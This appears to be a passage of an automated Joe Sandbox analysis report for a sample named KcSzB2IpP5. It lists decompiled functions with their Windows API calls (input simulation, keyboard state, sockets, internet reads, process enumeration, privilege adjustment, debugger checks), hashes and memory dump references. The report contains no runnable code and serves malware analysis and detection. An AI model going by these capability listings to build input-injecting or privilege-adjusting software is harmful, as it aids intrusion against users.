Instruction Fuzzy Hash: 64D17A71508201AFC304EF25D891A6BB7E8FF94708F00492EF5958B291EB75ED49CBA6

Function 004E22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 004E22E8

Part of subcall function 004DE4EC: GetWindowRect.USER32(?,?), ref: 004DE504

GetDesktopWindow.USER32 ref: 004E2312
GetWindowRect.USER32(00000000), ref: 004E2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 004E2355
GetCursorPos.USER32(?), ref: 004E2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004E23DF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 97ddf26e6c295d087673f0f74e030140d510fd7ebb96b912c9cd5519116e9e75
Instruction ID: 59bf608ffb8e482c2aacc0f26292d6746a670a6236c231c4ab230c32744b74f3
Opcode Fuzzy Hash: 97ddf26e6c295d087673f0f74e030140d510fd7ebb96b912c9cd5519116e9e75
Instruction Fuzzy Hash: F331E172105355ABD720DF26C944F6BB7AEFF84314F00091EF88497281DB78EA18CB96

Function 004D9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 004D9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 004D9C8B

Part of subcall function 004D3874: GetInputState.USER32 ref: 004D38CB
Part of subcall function 004D3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 004D9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 004D9C75

Strings

*.*, xrefs: 004D9B5D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: f4490d7b0a334584530ff569478d548a540f9e5e45d0a563a094b7c96937f87d
Instruction ID: cc534ee8e00103a225496b42aaa43c8636f7df451837613ee7486c250d901561
Opcode Fuzzy Hash: f4490d7b0a334584530ff569478d548a540f9e5e45d0a563a094b7c96937f87d
Instruction Fuzzy Hash: C64170719002099FDF14DF64C999AEE7BB8FF05304F20405BE805A3291EB349E94CF69

Function 0047997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00479BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00479BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00479A4E
GetSysColor.USER32(0000000F), ref: 00479B23
SetBkColor.GDI32(?,00000000), ref: 00479B36

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 0480858982b2240af1ce76481347f7c0e2519288734b1068d6ce587666bce831
Instruction ID: e3dff64061a28c8f0675d51fcef76fcd957d9e9ee63b3cf28e0e42f586de4730
Opcode Fuzzy Hash: 0480858982b2240af1ce76481347f7c0e2519288734b1068d6ce587666bce831
Instruction Fuzzy Hash: F5A11870109484BEE724AA3D8C58EFB3A9DEB82314F15811BF506D6795CA2DAD02D37E

Function 004E1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004E304E: inet_addr.WSOCK32(?), ref: 004E307A
Part of subcall function 004E304E: _wcslen.LIBCMT ref: 004E309B

socket.WSOCK32(00000002,00000002,00000011), ref: 004E185D
WSAGetLastError.WSOCK32 ref: 004E1884
bind.WSOCK32(00000000,?,00000010), ref: 004E18DB
WSAGetLastError.WSOCK32 ref: 004E18E6
closesocket.WSOCK32(00000000), ref: 004E1915

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: c3e40314a738303695a2bd2aa7324ca86c1b6f28e20af9e50217d97e4764dad1
Instruction ID: dd502ff238bdbe19c1b6e8ace333792fee1b4210d3f2b1c9dfa1447978a69328
Opcode Fuzzy Hash: c3e40314a738303695a2bd2aa7324ca86c1b6f28e20af9e50217d97e4764dad1
Instruction Fuzzy Hash: 9551A471A40200AFD710AF25C886F6A77E5AB4471CF08809EF9469F3D3D779AD41CBA6

Function 004F1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004F1CC0
IsWindowEnabled.USER32 ref: 004F1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 004F1CDB
IsIconic.USER32 ref: 004F1CE9
IsZoomed.USER32 ref: 004F1CF7

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: aae32aa0d2b4efe914faf39294e776a44478043549e402b7afc6da56f6740dcb
Instruction ID: 3dadf181e709da8ad990f9644d675383f67c312302c051ea776effad2b6e7427
Opcode Fuzzy Hash: aae32aa0d2b4efe914faf39294e776a44478043549e402b7afc6da56f6740dcb
Instruction Fuzzy Hash: B821B431740258DFE7208F1AC884B377BA5AF95314B18806EE946CB361C779EC42CB98

Function 004C8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004C82AA

Strings

(, xrefs: 004C82F0
tbR, xrefs: 004C84F4
|, xrefs: 004C82DA

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: lstrlen
String ID: ($tbR$|
API String ID: 1659193697-2803740749
Opcode ID: 3a370ba6277c2b6d2c2fd08affeec0d6046bdf2e56f6d96c5c8a19522a90c72a
Instruction ID: 8f21e9c90ec24b9c296b498a0c2e7104c832db006fdfffd5d46d1b21ece65023
Opcode Fuzzy Hash: 3a370ba6277c2b6d2c2fd08affeec0d6046bdf2e56f6d96c5c8a19522a90c72a
Instruction Fuzzy Hash: 7E323578A006059FCB68CF59C480E6AB7F0FF48710B15C56EE89ADB7A1EB74E941CB44

Function 004EA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004EA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 004EA6BA

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

Process32NextW.KERNEL32(00000000,?), ref: 004EA79C
CloseHandle.KERNEL32(00000000), ref: 004EA7AB

Part of subcall function 0047CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,004A3303,?), ref: 0047CE8A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: bfd1c053c7c46726805e6c4c0499f2251c33af907946a089f9d7094f9f80b274
Instruction ID: 64ef672d538acf2400c6e526153c917de8888d18e8bbf0a14a0d88b598c4515c
Opcode Fuzzy Hash: bfd1c053c7c46726805e6c4c0499f2251c33af907946a089f9d7094f9f80b274
Instruction Fuzzy Hash: B0517F715083009FD310EF25C885A6BBBE8FF89758F00491EF58597291EB74E914CB96

Function 004CAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 004CAAAC
SetKeyboardState.USER32(00000080), ref: 004CAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 004CAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 004CAB88

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 3b2e76e370971e84dc2f3ddeeb0f352e4b05f86f385b02c99ea0b320eea316f6
Instruction ID: 8ce9d6792d5e0ad1d537706c4e92adb297a7d55f2c4f7abb2f6402713a440586
Opcode Fuzzy Hash: 3b2e76e370971e84dc2f3ddeeb0f352e4b05f86f385b02c99ea0b320eea316f6
Instruction Fuzzy Hash: 95310874A4020CAEFB648A658809FBB77A6AB44318F04421FF281562D0E779ADA1C75B

Function 004DCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 004DCE89
GetLastError.KERNEL32(?,00000000), ref: 004DCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 004DCEFE

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 07360ad820d3debf9da703dfb5b57753af2a12fa95e513d7fd966cf3491c4104
Instruction ID: 83c59dc589d9776c53ce534638d47b3fcdaa0c45800d059af69799e03aa79211
Opcode Fuzzy Hash: 07360ad820d3debf9da703dfb5b57753af2a12fa95e513d7fd966cf3491c4104
Instruction Fuzzy Hash: 0521AEB19003069BD7209FA6C994BAB77FCEB50358F10442FE64692291E778EA05DB58

Function 004D5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004D5CC1
FindNextFileW.KERNEL32(00000000,?), ref: 004D5D17
FindClose.KERNEL32(?), ref: 004D5D5F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 406485337c6ff8a1fd033b19d732771c7bfd80737024e9599c517838ffd2c2a3
Instruction ID: 0bcc1d3426a5db1b8e17be59f033e143ff7759c00af0843beb2001e5485843de
Opcode Fuzzy Hash: 406485337c6ff8a1fd033b19d732771c7bfd80737024e9599c517838ffd2c2a3
Instruction Fuzzy Hash: AA519A346046019FC714DF28C494A9AB7E5FF49318F14855FE99A8B3A1DB34EC04CFA6

Function 00492622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0049271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00492724
UnhandledExceptionFilter.KERNEL32(?), ref: 00492731

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 09ac83f252a296e20e4bef3054f79ea0f6e53f4864ebcadda3b9e8f88d4afd13
Instruction ID: aa6b58991888bc50ec11a29731e794e73b52739b0d90044b327a4af0476ba9c8
Opcode Fuzzy Hash: 09ac83f252a296e20e4bef3054f79ea0f6e53f4864ebcadda3b9e8f88d4afd13
Instruction Fuzzy Hash: 4731F47091121CABCB21DF68DD887DDBBB8AF18310F1045EAE81CA7260E7749F858F48

Function 004D51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004D51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004D5238
SetErrorMode.KERNEL32(00000000), ref: 004D52A1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: d8881e7063b9e77966323792d66eef977cf99c35a93a442b33e8ab49946630e1
Instruction ID: 55f2037b8bbb84ce70a7fd5f2bcf8f4319601f7d3fdb3d83bd9cfa8ce63b3463
Opcode Fuzzy Hash: d8881e7063b9e77966323792d66eef977cf99c35a93a442b33e8ab49946630e1
Instruction Fuzzy Hash: 40315C35A00508DFDB00DF94D8C4EADBBB4FF09318F04809AE8059B392DB35E85ACB95

Function 004C16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0047FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00480668
Part of subcall function 0047FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00480685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004C170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004C173A
GetLastError.KERNEL32 ref: 004C174A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 0d72906e9a6e761bf49aedd334638139cbc563f7d100944ff1269d681323181a
Instruction ID: 44f6a77411bf61e654ef117b26b8c488da7b4c8976ad207c74bb8ea9361c2509
Opcode Fuzzy Hash: 0d72906e9a6e761bf49aedd334638139cbc563f7d100944ff1269d681323181a
Instruction Fuzzy Hash: 5611BFB2400208BFD7289F54DCC6EBBB7B9EB05714B20852FE05652251EB74BC45CA68

Function 004CD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004CD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004CD645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004CD650

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 93f668cef8d72874b8b2f477c56103f0a51a9265a24720015fdb82881bd09e95
Instruction ID: 2e34f843878406074e3d7452dc3545a16f0a72b002695e5264f9c2762e4d50a3
Opcode Fuzzy Hash: 93f668cef8d72874b8b2f477c56103f0a51a9265a24720015fdb82881bd09e95
Instruction Fuzzy Hash: E4118E75E01228BFDB108F98DD84FAFBBBCEB45B50F108126F904E7290C2704A01CBA5

Function 004C1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004C168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004C16A1
FreeSid.ADVAPI32(?), ref: 004C16B1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d616494f3af6cbfb63ae113dfabae814573375b4b7b97256dd3abafdcd6186e6
Instruction ID: 79ad7560697c22a30b90ac546a5e28c5017b52305df9fbf094f8425809922531
Opcode Fuzzy Hash: d616494f3af6cbfb63ae113dfabae814573375b4b7b97256dd3abafdcd6186e6
Instruction Fuzzy Hash: 2FF0447194030CFFDB00CFE08D89EAEBBBCEB08200F004865E500E2181E734AA049A58

Function 00484CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(004928E9,?,00484CBE,004928E9,005288B8,0000000C,00484E15,004928E9,00000002,00000000,?,004928E9), ref: 00484D09
TerminateProcess.KERNEL32(00000000,?,00484CBE,004928E9,005288B8,0000000C,00484E15,004928E9,00000002,00000000,?,004928E9), ref: 00484D10
ExitProcess.KERNEL32 ref: 00484D22

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b6ffd9f1d107ab94e69a0835663cfabced955dbf69dcfc8da4be3b712d1de38f
Instruction ID: f1531441d21761380be02527f569d9c413846defaf2a6ad73c486ccf98ae4054
Opcode Fuzzy Hash: b6ffd9f1d107ab94e69a0835663cfabced955dbf69dcfc8da4be3b712d1de38f
Instruction Fuzzy Hash: 3CE0B631000149ABCF22BF55DE49A697FA9EB81785B104429FC058A622CB39ED62DB88

Function 0049C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0049C36C

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 76e083b7013d600f72818e72163b33f3ffbd897153268f8a30ed4948221a1c98
Instruction ID: 3c183869c7284d8cbdb8b1aa6c45085728dae33eb99f62a23bdc1d6a1c57a302
Opcode Fuzzy Hash: 76e083b7013d600f72818e72163b33f3ffbd897153268f8a30ed4948221a1c98
Instruction Fuzzy Hash: 0E412872900219AFCF209FB9CC88DBB7B78EB84354F5042BEF905D7280E6749D418B58

Function 004BD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 004BD28C

Strings

X64, xrefs: 004BD2A8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: a15a25c27d9d4991f522d395065f81dfc5f44df13001257ea58e291bda847861
Instruction ID: 95cfb37c673b7d3e88f56f28acb2d52e6f672330e2db56c5d127c8a4c0b63b05
Opcode Fuzzy Hash: a15a25c27d9d4991f522d395065f81dfc5f44df13001257ea58e291bda847861
